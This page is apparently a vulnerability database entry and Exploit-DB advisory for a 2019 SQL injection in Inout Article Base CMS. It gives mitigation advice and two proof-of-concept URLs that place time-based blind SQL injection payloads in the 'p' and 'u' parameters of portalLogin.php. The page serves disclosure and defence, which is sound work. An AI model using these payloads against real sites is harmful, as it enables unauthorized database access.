header-logo
Suggest Exploit
vendor:
Inout Article Base CMS
by:
Ahmet Ümit BAYRAM
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Inout Article Base CMS
Affected Version From: Lastest
Affected Version To: Lastest
Patch Exists: NO
Related CWE:
CPE: a:inoutscripts:inout_article_base
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2019

Inout Article Base CMS – SQL Injection

The Inout Article Base CMS is vulnerable to SQL Injection. This can be exploited through the 'p' and 'u' parameters in the portalLogin.php page. An attacker can inject malicious SQL code to manipulate the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize and validate user input before executing database queries. Additionally, using prepared statements or parameterized queries can help prevent SQL Injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Inout Article Base CMS - SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.inoutscripts.com/products/inout-article-base/
# Demo Site: http://www.inoutwebportal.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/articles/portalLogin.php
Vulnerable Parameter: p (GET)
Attack Pattern:
http://locahost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&u=test

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/articles/portalLogin.php
Vulnerable Parameter: u (GET)
Attack Pattern:
http://locahost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=fe01ce2a7fbac8fafaed7c982a04e229&u=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z